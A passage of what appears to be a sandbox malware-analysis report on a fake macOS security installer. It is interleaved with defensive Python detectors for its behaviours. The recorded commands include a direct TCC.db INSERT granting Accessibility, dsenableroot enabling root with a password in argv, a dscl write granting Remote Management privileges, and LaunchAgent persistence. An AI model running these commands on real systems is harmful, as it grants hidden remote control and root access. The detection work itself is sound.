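The "Shell command executed" records above and the "Security executable" records are the same commands seen at two levels of the process tree (perl spawning sh -c, sh spawning dscl; the PIDs match one for one). Read together they show a single routine: list every account in the raw local directory node, read each account's uid to separate real users from the underscore-prefixed service accounts, check whether screen sharing is loaded, then write the real user's naprivs attribute, which is the per-user Remote Management (Apple Remote Desktop) privilege mask. The value written, 1073742079, is 0x400000FF. The following is an added example, not Joe Sandbox code, of detection logic that reconstructs that pattern from process-execution records. The input lines are constructed for the example and modelled on the report's entries (PID, then command line); the record format, the severity thresholds and the function names are assumptions for illustration.

```python
import os
import re
import shlex

# Constructed sample records modelled on the report, one per line as
# "<pid> <command line>". The PIDs and the abbreviated user list are illustrative.
SAMPLE_RECORDS = """\
548 /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
549 /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
556 /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
646 /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry uid
648 sh -c /bin/launchctl list com.apple.screensharing 2>/dev/null
665 sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/henry' naprivs 2>/dev/null
667 /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -create /Local/Target/Users/henry naprivs 1073742079
"""

# The raw local directory node. "-f <node> localonly" reads the plist store
# directly instead of going through opendirectoryd.
LOCAL_NODE = "/var/db/dslocal/nodes/Default"
REDIRECT = re.compile(r"^\d*[<>]")  # shell redirection tokens such as 2>/dev/null


def parse_records(text):
    """Return [(pid, argv)], unwrapping "sh -c ..." and dropping redirections."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, _, cmd = line.strip().partition(" ")
        argv = [tok for tok in shlex.split(cmd) if not REDIRECT.match(tok)]
        if argv[:2] == ["sh", "-c"]:
            argv = argv[2:]
        records.append((int(pid), argv))
    return records


def parse_dscl(argv):
    """Describe a dscl call: node, operation, record path, attribute and value."""
    if not argv or os.path.basename(argv[0]) != "dscl":
        return None
    info = {"node": None, "op": None, "record": None, "attr": None, "value": None}
    i = 1
    while i < len(argv):
        if argv[i] == "-f" and i + 1 < len(argv):
            info["node"] = argv[i + 1]
            i += 2
            continue
        if argv[i] in ("-list", "-read", "-create", "-append", "-delete"):
            rest = argv[i + 1:]
            info["op"] = argv[i][1:]
            info["record"] = rest[0] if rest else None
            info["attr"] = rest[1] if len(rest) > 1 else None
            info["value"] = rest[2] if len(rest) > 2 else None
            break
        i += 1
    return info


def user_of(record):
    """'/Local/Target/Users/henry' -> 'henry'; None for non-user records."""
    m = re.search(r"/Users/([^/]+)$", record or "")
    return m.group(1) if m else None


def is_service_account(name):
    """macOS daemon accounts carry a leading underscore; the uid reads single out the rest."""
    return name.startswith("_")


def triage(text):
    """Summarise the enumerate-then-grant pattern across a set of records."""
    f = {"local_node_listed": False, "uid_reads": 0, "real_users_probed": [],
         "screensharing_checked": False, "naprivs_writes": []}
    for _pid, argv in parse_records(text):
        if argv and os.path.basename(argv[0]) == "launchctl" \
                and argv[1:3] == ["list", "com.apple.screensharing"]:
            f["screensharing_checked"] = True
            continue
        d = parse_dscl(argv)
        if d is None or d["node"] != LOCAL_NODE:
            continue
        user = user_of(d["record"])
        if d["op"] == "list" and d["record"] == "/Local/Target/Users":
            f["local_node_listed"] = True
        elif d["op"] == "read" and d["attr"] == "uid" and user:
            f["uid_reads"] += 1
            if not is_service_account(user):
                f["real_users_probed"].append(user)
        elif d["op"] in ("create", "append") and d["attr"] == "naprivs" and user:
            f["naprivs_writes"].append((user, int(d["value"])))
    return f


def verdict(f):
    """Escalate on the naprivs write itself; enumeration alone is only suspicious."""
    if f["naprivs_writes"]:
        return "high"
    if f["local_node_listed"] and f["uid_reads"] >= 3:
        return "medium"
    return "low"


if __name__ == "__main__":
    result = triage(SAMPLE_RECORDS)
    print(verdict(result), result)
```

The write is the alertable event: a dscl -create or -append on naprivs outside an MDM or admin workflow is a Remote Management grant regardless of the exact bit pattern, so the rule keys on the attribute rather than on the value. The directory listing and the burst of uid reads are kept as supporting context because legitimate tooling also enumerates users.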
Executes the "kill" command typically used to terminate processes
Source: /usr/bin/perl5.18 (PID: 654) | Kill executable: /bin/kill -> /bin/kill -9 320
Executes the "mkdir" command used to create folders
Source: /bin/bash (PID: 533) | Mkdir executable: /bin/mkdir -> mkdir /Users/henry/.calisto/
Executes the "ps" command used to list the status of processes
Source: /usr/bin/perl5.18 (PID: 647) | Ps executable: /bin/ps -> /bin/ps auxwww
Source: /usr/bin/perl5.18 (PID: 650) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 651) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 652) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 653) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 655) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 657) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 658) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 659) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 660) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 661) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 662) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 663) | Ps executable: /bin/ps -> /bin/ps -acx
Source: /usr/bin/perl5.18 (PID: 664) | Ps executable: /bin/ps -> /bin/ps auxwww
Explicitly lists launch services, possibly for searching
Source: /bin/sh (PID: 649) | Launch agent/daemon listed: /bin/launchctl list com.apple.screensharing
Reads launchservices plist files
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Reads the user launchservices plist file containing the default apps for corresponding file types
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) | Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Writes 64-bit Mach-O files to disk
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/CryptoSwift
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftAppKit.dylib
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCore.dylib
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreData.dylib
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreGraphics.dylib
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreImage.dylib
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDarwin.dylib
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDispatch.dylib
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftFoundation.dylib
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftObjectiveC.dylib
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/MacOS/Mac Internet Security X9 Installer
Writes ZIP files to disk
Source: /usr/bin/zip (PID: 537) ZIP file created: /Users/henry/.calisto/zi6c7T1o
Source: /usr/bin/zip (PID: 539) ZIP file created: /Users/henry/.calisto/zi415Fng
Writes icon files to disk
Source: /bin/cp (PID: 674) File written: /System/Library/CoreServices/launchb.app/Contents/Resources/AppIcon.icns
Creates application bundles containing framework (and dylib) files
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plist
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/CryptoSwift
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/Resources/Info.plist
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftAppKit.dylib
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCore.dylib
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreData.dylib
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreGraphics.dylib
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreImage.dylib
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDarwin.dylib
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDispatch.dylib
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftFoundation.dylib
Source: /bin/cp (PID: 674) Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftObjectiveC.dylib
Source: /bin/cp (PID: 674) Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Alamofire -> Versions/Current/Alamofire
Source: /bin/cp (PID: 674) Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Resources -> Versions/Current/Resources
Source: /bin/cp (PID: 674) Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/Current -> A
Source: /bin/cp (PID: 674) Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/CryptoSwift -> Versions/Current/CryptoSwift
Source: /bin/cp (PID: 674) Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Resources -> Versions/Current/Resources
Source: /bin/cp (PID: 674) Framework directory symbolic link created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/Current -> A
Creates application bundles containing icon files
Source: /bin/cp (PID: 674) Icon file created: /System/Library/CoreServices/launchb.app/Contents/Resources/AppIcon.icns
Reads data from the local random generator
Source: /usr/bin/sqlite3 (PID: 541) Random device file read: /dev/urandom
Source: /usr/bin/perl5.18 (PID: 546) Random device file read: /dev/urandom
Uses the AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to disk
Source: /bin/cp (PID: 674) XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plist
Source: /bin/cp (PID: 674) XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/Resources/Info.plist
Source: /bin/cp (PID: 674) XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Info.plist
Source: /bin/cp (PID: 674) Binary plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/Info.plist
Source: /bin/cp (PID: 674) Binary plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/MainMenu.nib
Source: /bin/cp (PID: 674) Binary plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/NSWindowController-B8D-0N-5wS.nib
Source: /bin/cp (PID: 674) Binary plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/Base.lproj/Main.storyboardc/XfG-lQ-9wD-view-m2S-Jp-Qdl.nib
Source: /bin/cp (PID: 674) XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/com.intego.Mac-Internet-Security-X9-Installer.plist
Source: /bin/cp (PID: 674) XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Resources/InfoL.plist
Source: /bin/cp (PID: 678) XML plist file created: /System/Library/CoreServices/launchb.app/Contents/Info.plist
Source: /bin/cp (PID: 680) XML plist file created: /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist

Boot Survival:

Creates launch services that launchd starts at load (RunAtLoad) and/or restarts when they exit (KeepAlive)
Source: /bin/cp (PID: 680) Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist
Creates launchd-managed per-user services (launch agents); an agent placed in /Library/LaunchAgents is loaded at login for every user on the machine
Source: /bin/cp (PID: 680) Launch agent created, file created: /Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist
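The persistence chain above is a LaunchAgent whose label borrows the Intego bundle identifier while its program lives in a bundle (launchb.app) the sample copied into /System/Library/CoreServices. The following is an added example, not code from the report or from the sample: it parses a launchd job plist and reports the facts a triage analyst checks first. The report does not show the plist contents, so the sample plist below is constructed from what the report does state (RunAtLoad/KeepAlive set, the dropped program path) and the heuristics (Apple-only path prefixes, vendor-name mismatch) are the author's own assumptions.

```python
"""Audit a launchd agent/daemon plist for persistence flags and suspicious program locations.

Added example; not Joe Sandbox or sample code. The plist bytes are constructed.
"""
import plistlib

# Constructed plist mirroring the report: RunAtLoad + KeepAlive, program inside the
# bundle the sample dropped under /System/Library/CoreServices (exact keys assumed).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.intego.Mac-Internet-Security-X9-Installer</string>
    <key>ProgramArguments</key>
    <array>
        <string>/System/Library/CoreServices/launchb.app/Contents/MacOS/Mac Internet Security X9 Installer</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <true/>
</dict>
</plist>
"""

# Constructed benign job for comparison: Apple label, Apple path, no persistence flags.
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.apple.example",
    "Program": "/System/Library/CoreServices/Example",
})

# Locations only Apple populates on a SIP-enabled system (assumed list).
APPLE_ONLY_PREFIXES = ("/System/Library/", "/usr/bin/", "/bin/", "/sbin/", "/usr/sbin/")


def program_path(job: dict) -> str:
    """launchd accepts either Program or ProgramArguments[0] as the executable."""
    if "Program" in job:
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else ""


def audit_launch_job(plist_bytes: bytes, plist_path: str) -> dict:
    """Return persistence facts and a list of findings for one launchd job plist."""
    job = plistlib.loads(plist_bytes)
    label = job.get("Label", "")
    prog = program_path(job)
    # KeepAlive may be a bool or a dict of conditions; either keeps the job running.
    keep_alive = bool(job.get("KeepAlive", False))
    run_at_load = bool(job.get("RunAtLoad", False))
    is_apple = label.startswith("com.apple.")

    findings = []
    if run_at_load or keep_alive:
        findings.append("persists: RunAtLoad=%s KeepAlive=%s" % (run_at_load, keep_alive))
    if not is_apple and prog.startswith(APPLE_ONLY_PREFIXES):
        findings.append("non-Apple label %r runs a binary under Apple-only path %s" % (label, prog))
    # Heuristic: the vendor segment of a reverse-DNS label usually appears in the bundle path.
    vendor = label.split(".")[1].lower() if label.count(".") >= 1 else ""
    if not is_apple and vendor and vendor not in prog.lower():
        findings.append("label vendor %r does not appear in the program path" % vendor)
    if plist_path.startswith("/Library/LaunchAgents/"):
        findings.append("system-wide LaunchAgent: loads at login for every user")
    return {"label": label, "program": prog, "run_at_load": run_at_load,
            "keep_alive": keep_alive, "findings": findings}


if __name__ == "__main__":
    path = "/Library/LaunchAgents/com.intego.Mac-Internet-Security-X9-Installer.plist"
    for line in audit_launch_job(SAMPLE_PLIST, path)["findings"]:
        print(line)
```

On a live host, feed the function the real file (`audit_launch_job(open(p, "rb").read(), p)`) for every plist under /Library/LaunchAgents, /Library/LaunchDaemons and ~/Library/LaunchAgents; the vendor-mismatch heuristic will produce some benign noise, so treat it as a prompt to look, not as a verdict.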

Hooking and other Techniques for Hiding and Protection:

Modifies the SQLite TCC database directly to grant itself Accessibility access (writing the row avoids the user consent dialog)
Source: /usr/bin/sudo (PID: 541) TCC.db kTCCServiceAccessibility modification: /usr/bin/sqlite3 -> /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL)
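The INSERT above writes a consent row by hand: client_type 0 means the client is identified by bundle ID, allowed=1 grants the service, and csreq is NULL, meaning no code-signing requirement is attached. Since El Capitan the TCC database directory is protected by SIP, so this write only succeeds when SIP is disabled, a precondition the report does not state either way. The following is an added example, not report or sample code: it rebuilds the High Sierra-era `access` table in memory (column names are assumed from that schema, which the 7-value INSERT matches), replays the captured statement next to a constructed benign grant, and then lists Accessibility grants that carry no csreq, which is a useful heuristic because grants made through the normal TCC prompt record one.

```python
"""Audit TCC.db Accessibility grants for rows that look injected rather than prompted.

Added example; not Joe Sandbox or sample code. Schema and benign row are assumed/constructed.
"""
import sqlite3

# Assumed 10.13 schema of the TCC 'access' table (matches the 7-value INSERT in the report).
SCHEMA = """
CREATE TABLE access (
    service      TEXT    NOT NULL,
    client       TEXT    NOT NULL,
    client_type  INTEGER NOT NULL,   -- 0 = bundle identifier, 1 = absolute path
    allowed      INTEGER NOT NULL,   -- 1 = granted
    prompt_count INTEGER NOT NULL,
    csreq        BLOB,               -- code-signing requirement recorded by TCC's prompt path
    policy_id    INTEGER,
    PRIMARY KEY (service, client, client_type)
);
"""

# Statement captured in the report, run via sudo against
# /Library/Application Support/com.apple.TCC/TCC.db.
MALICIOUS_INSERT = (
    "INSERT or REPLACE INTO access VALUES("
    "'kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL)"
)

# Constructed benign row: a grant made through the consent dialog carries a csreq blob
# (the blob value here is a placeholder, not a real requirement).
BENIGN_INSERT = (
    "INSERT INTO access VALUES('kTCCServiceAccessibility','com.example.Helper',0,1,1,X'FADE0C00',NULL)"
)


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for TCC.db with one benign and one injected Accessibility grant."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.execute(BENIGN_INSERT)
    con.execute(MALICIOUS_INSERT)
    con.commit()
    return con


def suspicious_grants(con: sqlite3.Connection, service: str = "kTCCServiceAccessibility") -> list:
    """Allowed grants for `service` that have no code-signing requirement attached.

    Heuristic: TCC's own UI path stores csreq; a raw sqlite3 INSERT like the one in the
    report typically leaves it NULL. Review every hit; do not auto-delete.
    """
    rows = con.execute(
        "SELECT client, client_type, prompt_count FROM access "
        "WHERE service = ? AND allowed = 1 AND csreq IS NULL ORDER BY client",
        (service,),
    ).fetchall()
    return [{"client": c, "client_type": t, "prompt_count": p} for c, t, p in rows]


if __name__ == "__main__":
    for hit in suspicious_grants(build_db()):
        print("injected-looking grant:", hit)
```

Against a real host, point `sqlite3.connect` at a read-only copy of TCC.db (`file:...?mode=ro` with `uri=True`) taken by a process that has Full Disk Access; the schema has changed on later macOS releases (extra columns such as auth_value replace allowed), so adjust the SELECT before reusing it there.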

HIPS / PFW / Operating System Protection Evasion:

Executes the "dsenableroot" command used to enable/disable the root account (here enabling it, with the new root password passed on the command line)
Source: /bin/bash (PID: 670) Dsenableroot executable: /usr/sbin/dsenableroot -> dsenableroot -p -r aGNOStIC7890!!!
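Every step of this chain runs as a short-lived child process with its intent visible in argv: dsenableroot carrying the root password, sqlite3 writing TCC.db, dscl reading a user's ARD privileges (naprivs), launchctl probing com.apple.screensharing, and a hidden staging directory under the home folder. The following is an added example, not report or sample code: it runs a small set of command-line rules over process-execution events. The events are transcribed from the report's behaviour lines (PIDs and argv as shown there); the rule names, severities and regular expressions are the author's own and are only a starting point for a real detection.

```python
"""Command-line detection rules for the macOS behaviours listed in the report.

Added example; not Joe Sandbox or sample code. Rules and severities are the author's own.
"""
import re

# Constructed telemetry: (pid, argv) transcribed from the report's behaviour lines.
# A real collector would take these from EndpointSecurity exec events or Unified Logging.
EVENTS = [
    (533, "mkdir /Users/henry/.calisto/"),
    (541, "/usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access "
          "VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL)"),
    (547, "/usr/bin/sw_vers -productVersion"),
    (649, "/bin/launchctl list com.apple.screensharing"),
    (654, "/bin/kill -9 320"),
    (664, "/bin/ps auxwww"),
    (666, "/usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry naprivs"),
    (670, "dsenableroot -p -r aGNOStIC7890!!!"),
]

RULES = [
    # dsenableroot without -d enables root; -r puts the new root password into argv,
    # where any local user can read it with ps.
    ("root_account_enabled_with_argv_password", "high",
     re.compile(r"(^|/)dsenableroot\b(?!.*\s-d\b).*\s-r\s+\S+")),
    # Direct writes to the TCC database bypass the consent prompt.
    ("tcc_db_direct_write", "high",
     re.compile(r"sqlite3\b.*com\.apple\.TCC/TCC\.db\b.*\b(INSERT|REPLACE|UPDATE|DELETE)\b", re.I)),
    # Reading a user's naprivs attribute = checking Apple Remote Desktop privileges.
    ("ard_privilege_recon", "medium",
     re.compile(r"(^|/)dscl\b.*-read\s+/Local/.*/Users/\S+\s+naprivs\b")),
    # Asking launchd specifically about Screen Sharing.
    ("screen_sharing_probe", "low",
     re.compile(r"(^|/)launchctl\s+list\s+com\.apple\.screensharing\b")),
    # Dot-directory created directly under a home folder (staging area).
    ("hidden_dir_in_home", "low",
     re.compile(r"(^|/)mkdir\b.*\s/Users/[^/\s]+/\.[^/\s]+")),
]

SEVERITY_ORDER = {"none": 0, "low": 1, "medium": 2, "high": 3}


def scan(events):
    """Return one hit per (event, matching rule), preserving event order."""
    hits = []
    for pid, cmd in events:
        for name, severity, rx in RULES:
            if rx.search(cmd):
                hits.append({"pid": pid, "rule": name, "severity": severity, "cmd": cmd})
    return hits


def max_severity(hits) -> str:
    """Highest severity among the hits, or 'none'."""
    return max((h["severity"] for h in hits), key=SEVERITY_ORDER.get, default="none")


if __name__ == "__main__":
    found = scan(EVENTS)
    for h in found:
        print("%-6s pid=%d %s" % (h["severity"], h["pid"], h["rule"]))
    print("overall:", max_severity(found))
```

The benign-looking `ps`, `kill` and `sw_vers` executions deliberately match nothing on their own; in a production rule set they become interesting only when correlated with the same parent process as the high-severity hits, which is exactly how this sample chains them.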
Reads the sysctl safe boot value (probably to check whether the system is in safe boot mode)
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529) Sysctl read request: kern.safeboot (1.66)

Language, Device and Operating System Detection:

Reads process information of other processes
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.546 -> queries PID 546
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.545 -> queries PID 545
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.544 -> queries PID 544
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.534 -> queries PID 534
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.530 -> queries PID 530
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.529 -> queries PID 529
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.521 -> queries PID 521
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.519 -> queries PID 519
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.512 -> queries PID 512
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.508 -> queries PID 508
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.478 -> queries PID 478
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.477 -> queries PID 477
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.427 -> queries PID 427
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.423 -> queries PID 423
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.422 -> queries PID 422
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.421 -> queries PID 421
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.420 -> queries PID 420
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.419 -> queries PID 419
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.418 -> queries PID 418
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.417 -> queries PID 417
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.416 -> queries PID 416
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.415 -> queries PID 415
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.414 -> queries PID 414
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.413 -> queries PID 413
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.412 -> queries PID 412
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.411 -> queries PID 411
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.408 -> queries PID 408
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.407 -> queries PID 407
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.406 -> queries PID 406
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.405 -> queries PID 405
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.404 -> queries PID 404
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.403 -> queries PID 403
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.402 -> queries PID 402
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.400 -> queries PID 400
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.399 -> queries PID 399
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.397 -> queries PID 397
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.394 -> queries PID 394
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.393 -> queries PID 393
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.392 -> queries PID 392
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.391 -> queries PID 391
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.390 -> queries PID 390
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.389 -> queries PID 389
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.387 -> queries PID 387
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.386 -> queries PID 386
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.380 -> queries PID 380
Source: /bin/ps (PID: 647) Sysctl requested: kern.procargs2 (1.49) only found for 1.49.379 -> queries PID 379
